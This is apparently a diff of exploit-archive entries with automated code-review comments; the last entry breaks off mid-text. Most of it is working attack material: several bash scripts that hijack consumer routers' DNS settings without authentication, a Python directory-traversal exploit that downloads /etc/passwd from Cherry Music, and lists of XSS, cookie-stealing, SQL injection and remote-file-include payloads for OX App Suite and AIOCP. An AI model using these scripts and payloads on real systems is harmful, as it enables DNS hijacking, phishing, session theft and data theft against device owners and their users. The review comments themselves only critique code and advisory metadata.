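Review bot: apart from the two banner strings (`# Inteno EG101R1 VoIP Router` and the matching `echo` on the usage screen, which also carries trailing whitespace inside the quotes), this file is line-for-line identical to 40367.sh, including the `0&> /dev/null <&1` tail that hands a stray `0` argument to GET instead of redirecting both streams, the unused `$GET` variable, and the bare `exit;` on both error paths that returns 0 on failure; fix the redirection to `>/dev/null 2>&1` and use `exit 1` here as well, or better, collapse the duplicated scripts into one.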
81
platforms/cgi/webapps/40369.sh
Executable file
|
@ -0,0 +1,81 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# PIKATEL 96338WS, 96338L-2M-8M Unauthenticated Remote DNS Change Exploit
|
||||
#
|
||||
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
|
||||
# https://www.ethical-hacker.org/
|
||||
# https://www.facebook.com/ethicalhackerorg
|
||||
#
|
||||
# Description:
|
||||
# The vulnerability exist in the web interface, which is
|
||||
# accessible without authentication.
|
||||
#
|
||||
# Once modified, systems use foreign DNS servers, which are
|
||||
# usually set up by cybercriminals. Users with vulnerable
|
||||
# systems or devices who try to access certain sites are
|
||||
# instead redirected to possibly malicious sites.
|
||||
#
|
||||
# Modifying systems' DNS settings allows cybercriminals to
|
||||
# perform malicious activities like:
|
||||
#
|
||||
# o Steering unknowing users to bad sites:
|
||||
# These sites can be phishing pages that
|
||||
# spoof well-known sites in order to
|
||||
# trick users into handing out sensitive
|
||||
# information.
|
||||
#
|
||||
# o Replacing ads on legitimate sites:
|
||||
# Visiting certain sites can serve users
|
||||
# with infected systems a different set
|
||||
# of ads from those whose systems are
|
||||
# not infected.
|
||||
#
|
||||
# o Controlling and redirecting network traffic:
|
||||
# Users of infected systems may not be granted
|
||||
# access to download important OS and software
|
||||
# updates from vendors like Microsoft and from
|
||||
# their respective security vendors.
|
||||
#
|
||||
# o Pushing additional malware:
|
||||
# Infected systems are more prone to other
|
||||
# malware infections (e.g., FAKEAV infection).
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous programs is for Educational
|
||||
# purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the
|
||||
# fact that Todor Donev is not liable for any
|
||||
# damages caused by direct or indirect use of the
|
||||
# information or functionality provided by these
|
||||
# programs. The author or any Internet provider
|
||||
# bears NO responsibility for content or misuse
|
||||
# of these programs or any derivatives thereof.
|
||||
# By using these programs you accept the fact
|
||||
# that any damage (dataloss, system crash,
|
||||
# system compromise, etc.) caused by the use
|
||||
# of these programs is not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use them at your own risk!
|
||||
#
|
||||
#
|
||||
|
||||
if [[ $# -gt 3 || $# -lt 2 ]]; then
|
||||
echo " PIKATEL 96338WS, 96338L-2M-8M ADSL Router "
|
||||
echo " Unauthenticated Remote DNS Change Exploit"
|
||||
echo " ==================================================================="
|
||||
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
|
||||
echo ""
|
||||
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
|
||||
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
|
||||
exit;
|
||||
fi
|
||||
GET=`which GET 2>/dev/null`
|
||||
if [ $? -ne 0 ]; then
|
||||
echo " Error : libwww-perl not found =/"
|
||||
exit;
|
||||
fi
|
||||
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
|
||||
|
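Review bot: the header puts both models on one line (`# PIKATEL 96338WS, 96338L-2M-8M Unauthenticated Remote DNS Change Exploit`), which is why this file is 81 lines where its siblings are 82; the banner uses a comma between the models while the files.csv description for 40369 uses `96338WS_ 96338L-2M-8M`, so the two should be reconciled. The body is otherwise a copy of 40367.sh and carries the same defects: `0&> /dev/null <&1` passes `0` as an extra argument instead of redirecting stdout and stderr, `$GET` is assigned but never used, and `exit;` returns 0 after the usage and libwww-perl errors.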
82
platforms/cgi/webapps/40370.sh
Executable file
|
@ -0,0 +1,82 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# PLANET VDR-300NU ADSL ROUTER
|
||||
# Unauthenticated Remote DNS Change Exploit
|
||||
#
|
||||
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
|
||||
# https://www.ethical-hacker.org/
|
||||
# https://www.facebook.com/ethicalhackerorg
|
||||
#
|
||||
# Description:
|
||||
# The vulnerability exist in the web interface, which is
|
||||
# accessible without authentication.
|
||||
#
|
||||
# Once modified, systems use foreign DNS servers, which are
|
||||
# usually set up by cybercriminals. Users with vulnerable
|
||||
# systems or devices who try to access certain sites are
|
||||
# instead redirected to possibly malicious sites.
|
||||
#
|
||||
# Modifying systems' DNS settings allows cybercriminals to
|
||||
# perform malicious activities like:
|
||||
#
|
||||
# o Steering unknowing users to bad sites:
|
||||
# These sites can be phishing pages that
|
||||
# spoof well-known sites in order to
|
||||
# trick users into handing out sensitive
|
||||
# information.
|
||||
#
|
||||
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#

if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " PLANET VDR-300NU ADSL ROUTER "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
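Review bot: the argument check `if [[ $# -gt 3 || $# -lt 2 ]]` admits a two-argument invocation, and the usage text advertises it (`Example: $0 133.7.133.7 8.8.8.8`), yet the request line always interpolates `$3`, so with two arguments the script sends an empty `dnsSecondary=` value; either the usage text should say that the secondary server is then cleared, or the check should demand three arguments. The header also names the product but no firmware build, CVE or vendor reference, and the `dnsDynamic=0&dnsRefresh=1` parameters of the `dnscfg.cgi` request are undocumented, so an operator reading this entry cannot tell which builds are affected or what the request changes beyond the two DNS addresses.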
82
platforms/cgi/webapps/40371.sh
Executable file
@ -0,0 +1,82 @@
#!/bin/bash
#
# Tenda ADSL2/2+ Modem 963281TAN
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#

if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Tenda ADSL2/2+ Modem 963281TAN "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
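Review bot: the trailing `0&> /dev/null <&1` on the final line is not a valid bash redirection: the `0` is passed to GET as an extra positional argument rather than forming part of the redirection, and `&> /dev/null` then discards both stdout and stderr, so the script prints nothing and GET's exit status is never examined. The `exit;` statements in the usage branch and in the libwww-perl check likewise exit 0, so a caller cannot distinguish a usage error or missing dependency from a completed run; `exit 1` there and a plain `2>/dev/null` on the request line would make the outcome observable. The same final line appears verbatim in 40372.sh and 40373.sh.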
82
platforms/cgi/webapps/40372.sh
Executable file
@ -0,0 +1,82 @@
#!/bin/bash
#
# COMTREND ADSL Router CT-5367 C01_R12, CT-5624 C01_R03
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#

if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " COMTREND ADSL Router CT-5367 C01_R12, CT-5624 C01_R03"
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
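Review bot: the header names two hardware models with board revisions (CT-5367 C01_R12, CT-5624 C01_R03) but no firmware version, test date or vendor advisory, and everything in the Description block from `# Once modified, systems use foreign DNS servers` down to the disclaimer is generic DNS-hijacking text shared word for word with 40371.sh and 40373.sh rather than anything established on this device. An exploit-db entry should record what was actually verified on this hardware (which firmware answered `dnscfg.cgi` without a session) and whether the vendor has shipped a fix, since that is what an operator needs to decide whether to patch or to firewall the management interface. Minor: `The vulnerability exist in the web interface` should read `exists`.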
81
platforms/cgi/webapps/40373.sh
Executable file
@ -0,0 +1,81 @@
#!/bin/bash
#
# ASUS DSL-X11 ADSL Router Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#

if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " ASUS DSL-X11 ADSL Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
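Review bot: the dependency check assigns `GET=\`which GET 2>/dev/null\`` and tests `$?`, but `$GET` is never used afterwards; the last line invokes bare `GET`, so the assignment is dead code and `command -v GET >/dev/null || exit 1` would express the intent without the unused variable. The example target `133.7.133.7` in the usage banner is a publicly routable address rather than one of the RFC 5737 documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24); examples in published exploit entries should use those ranges so that a copied-and-pasted usage line cannot reach a real host. Cosmetic: this file folds product and title onto one header line while the three sibling scripts split them, which matters because the files.csv descriptions are derived from these headers.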
89
platforms/linux/webapps/40377.txt
Executable file
@ -0,0 +1,89 @@
Product: OX Guard
Vendor: OX Software GmbH

Internal reference: 47878 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
Vendor notification: 2016-08-03
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6854
CVSS: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
Script code which got injected to a mail with inline PGP signature gets executed when verifying the signature.

Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).

Steps to reproduce:
1. Add JS code to a mail body
2. Use PGP inline signatures
3. Open the mail in OX App Suite

Solution:
Users should not open mail from untrusted sources. We made sure that the verified content does not get handled in a way that code can get executed. Operators should update to the latest Patch Release.



Internal reference: 47914 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: secator
Vendor notification: 2016-08-05
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6853
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
Script code and references to external websites can be injected to the names of PGP public keys. When requesting that key later on using a specific URL, such script code might get executed. In case of injecting external websites, users might get lured into a phishing scheme.

Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).

Steps to reproduce:
1. As attacker, create a PGP key with malicious name
2. Get the key ID and create a link which will fetch that key
3. Make the victim call that link

Solution:
Users should not click links from untrusted sources. We now sanitize the returned key and make sure HTML content does not get interpreted by the browser. Operators should update to the latest Patch Release.



Internal reference: 48080 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
Vendor notification: 2016-08-15
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6851
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
Script code can be provided as parameter to the OX Guard guest reader web application. This allows cross-site scripting attacks against arbitrary users since no prior authentication is needed.

Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.) in case the user has a active session on the same domain already.

Steps to reproduce:
1. As attacker, create a hyperlink with script code included at the "templid" parameter
2. Make the victim open that link

Solution:
Users should not click links from untrusted sources. We now sanitize the returned content for this parameter. Operators should update to the latest Patch Release.
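Review bot: the CVSS line for bug 47878 (CVE-2016-6854) gives a score of 6.5, but its vector `CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N` is exactly the vector that the entries for 47914 and 48080 score as 4.3, and that vector does evaluate to 4.3; either the score or the vector for 47878 is wrong and the two should be reconciled before this advisory is indexed. All three entries list the same `Fixed version: 2.4.0-rev11, 2.4.2-rev5` without a per-issue patch reference, so operators cannot confirm which revision closes which bug. The file is also committed with the executable bit set (`Executable file`) although it is a plain-text advisory under platforms/linux/webapps; the same applies to 40378.txt.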
91
platforms/linux/webapps/40378.txt
Executable file
@ -0,0 +1,91 @@
Product: OX App Suite
Vendor: OX Software GmbH

Internal reference: 46484 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev46, 7.6.3-rev14, 7.8.0-rev29, 7.8.1-rev16, 7.8.2-rev5
Vendor notification: 2016-06-09
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
Description fields of ressources could be used to inject malicious HTML/JS code. When scheduling group appointments and adding such a ressource, the injected code gets executed in the context of a user when viewing appointment details.

Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Note however that explicit permissions are required to create or modify resources in a way that they could contain script code.

Steps to reproduce:
1. Provide HTML including script code as resource description
2. Add this resource to a group appointment
3. As group members, examine the appointment details.

Solution:
Permission settings can be temporarily tightened to reject resource modifications by users. Such descriptions are now handled as plain-text to avoid any kind of script execution. Operators should update to the latest Patch Release.


Internal reference: 46894 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: backend
Researcher credits: Jakub A>>oczek
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
Vendor notification: 2016-06-27
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
Script code can be injected to HTML E-Mail hyperlinks by using the "data" schema. This method bypasses existing sanitization methods. As a result the script code got injected to hyperlinks displayed at OX App Suite UI.

Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).

Steps to reproduce:
1. Compose malicious mail with a link containing a "data" schema with JS code included
2. Make a user click the link

Proof of concept:
<a href="data:text/html,<script>alert(document.cookie);</script>">click me</a>

Solution:
Users should not or interact with mails from untrusted external sources. Targets of hyperlinks shall be examined before clicking the respective link. Operators should update to the latest Patch Release.


Internal reference: 47062 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
Vendor notification: 2016-06-27
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
Script code can be stored to the temporary storage for inline-images in HTML E-Mails. Content is available to the user who stored it but also to other (external) users if the unique random ID is known. Note that this storage is volatile and expires if not regulary refreshed. A attacker could however re-upload and refresh the file once uploaded.

Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).

Steps to reproduce:
1. Create a file with script code that gets rendered within the browser, e.g. a SVG image with XSL headers
2. Alter the upload request for file?action=new from "image" to "file" to circumvent image related checks
3. Set a MIME-type that makes the browser render the file content inline instead of downloading
4. Fetch the returned UUID
5. Create a link which includes the storage location for the specific item
6. Make a user click that link

Solution:
Users should not open hyperlinks from untrusted sources. Operators should update to the latest Patch Release.
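Review bot: all three entries (bugs 46484, 46894 and 47062) carry the same `CVE reference: CVE-2016-5740` although they describe distinct flaws in different components (frontend resource descriptions, backend handling of `data:` hyperlinks, backend inline-image storage) with different fixed revisions; if one CVE really covers all three the advisory should state that, otherwise two of the identifiers are wrong. The researcher credit for 46894 is mis-encoded (`Jakub A>>oczek`), `ressources` should read `resources`, `regulary` should read `regularly`, and the sentence `Users should not or interact with mails from untrusted external sources` is missing a verb. The Solution block for 46894 is also the only one that does not say what the patch changes; it gives user-side advice and `update to the latest Patch Release`, whereas the other two describe the server-side handling that was changed, which is what lets an operator verify the fix.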
@ -1,9 +1,71 @@
source: http://www.securityfocus.com/bid/20931/info

All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.


Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, access or modify sensitive data, execute arbitrary script code in the context of the application, compromise the application and possibly exploit latent vulnerabilities in the underlying system; other attacks are also possible.


AIOCP 1.3.007 and prior versions are vulnerable.

http://www.example.com/public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main

Cross-site scripting =
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_dpage.php?choosed_language=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=3&catid=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_show_ec_products.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_users_online.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_links_search.php?orderdir=</textarea>'"><script>alert(document.cookie)</script>

Remote File-Include =
/admin/code/index.php?load_page=http%3A//google.com
( no login needed for the remote file include )

SQL-Injection =
- http://www.example.com/public/code/cp_dpage.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_news.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_news.php?news_category=[sql]
-
http://www.example.com/public/code/cp_forum_view.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_edit_user.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_newsletter.php?nlmsg_nlcatid=[sql]
-
http://www.example.com/public/code/cp_newsletter.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_links.php?links_category=[sql]
- http://www.example.com/public/code/cp_links.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_contact_us.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_show_ec_products.php?product_category_id=[sql]
-
http://www.example.com/public/code/cp_show_ec_products.php?product_category_id=[sql]
-
http://www.example.com/public/code/cp_show_ec_products.php?order_field=[sql]
- http://www.example.com/public/code/cp_login.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_users_online.php?order_field=cpsession_expiry&submitted=1&firstrow=[sql]
-
http://www.example.com/public/code/cp_codice_fiscale.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_links_search.php?orderdir=[sql]


Full Path Disclosure =
-
http://www.example.com/public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main
-
http://www.example.com/public/code/cp_show_ec_products.php?order_field[]=
- http://www.example.com/public/code/cp_show_page_help.php?hp[]=
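Review bot: the hunk header `@ -1,9 +1,71 @@` shows this entry rewriting an existing 9-line file, but the rendered view carries neither a file name nor the removed lines, so a reader cannot tell which archived entry was replaced or what was dropped; the commit should name the file so the change can be traced in files.csv. Within the new text several lines are duplicates: the `cp_forum_view.php?fmode=top&topid=53&forid=</textarea>...` URL appears twice in the XSS list, `cp_show_ec_products.php?product_category_id=[sql]` appears twice under SQL-Injection, and `cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main` is listed once as a bare line above the XSS section and again under Full Path Disclosure. The lone `-` lines are bullet markers separated from their URLs by line wrapping and should be rejoined as `- http://...`, as the shorter SQL-Injection entries already are.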
36
platforms/php/webapps/40361.py
Executable file
@ -0,0 +1,36 @@
# Exploit Title: Cherry Music v0.35.1 directory traversal vulnerability allows authenticated users to download arbitrary files
# Date: 11-09-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: http://www.fomori.org/cherrymusic/index.html
# Software Link: http://www.fomori.org/cherrymusic/versions/cherrymusic-0.35.1.tar.gz
# Version: 0.35.1
# Tested on: ubuntu 14.04 LTS
# CVE : CVE-2015-8309

import urllib2, cookielib, urllib

#set parameters here
username = 'admin'
password = 'Password01'
baseUrl = 'http://localhost:8080/'
targetFile = '/etc/passwd'
downloadFileName = 'result.zip'
####

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
params = urllib.urlencode({'username': username, 'password': password, 'login': 'login'})
req = urllib2.Request(baseUrl, params)
response = opener.open(req)
for c in cj:
if c.name == "session_id":
session_id = c.value

opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders.append(('Cookie', 'session_id=' + session_id))
params = urllib.urlencode({'value': '["' + targetFile + '"]'})
request = urllib2.Request(baseUrl + "download", params)
response = opener.open(request).read()
with open(downloadFileName, 'wb') as zipFile:
zipFile.write(response)
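Review bot: `session_id` is only ever assigned inside `for c in cj: if c.name == "session_id":`, so when the login response sets no cookie of that name the script fails with a NameError on the `opener.addheaders.append` line rather than reporting that the login did not succeed; the `response` from the login request is never examined either. The second `build_opener(urllib2.HTTPCookieProcessor(cj))` already sends every cookie in the jar, so the manually appended `Cookie: session_id=` header duplicates what the cookie processor emits and can be dropped. The script is Python 2 only (`urllib2`, `cookielib`), which the header should state, and `Password01` / `localhost:8080` are placeholders that the `#set parameters here` block should mark as values to replace.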
32
platforms/php/webapps/40364.txt
Executable file
@ -0,0 +1,32 @@
# Exploit Title: wdcalendar version 2 sql injection vulnerability
# Google Dork: allinurl:"wdcalendar/edit.php"
# Date: 12/09/2016
# Exploit Author: Alfonso Castillo Angel
# Software Link: https://github.com/ronisaha/wdCalendar
# Version: Version 2
# Tested on: Windows 7 ultimate
# Category: webapps

* Affected file -> edit.php and edit.db.php
* Exploit ->
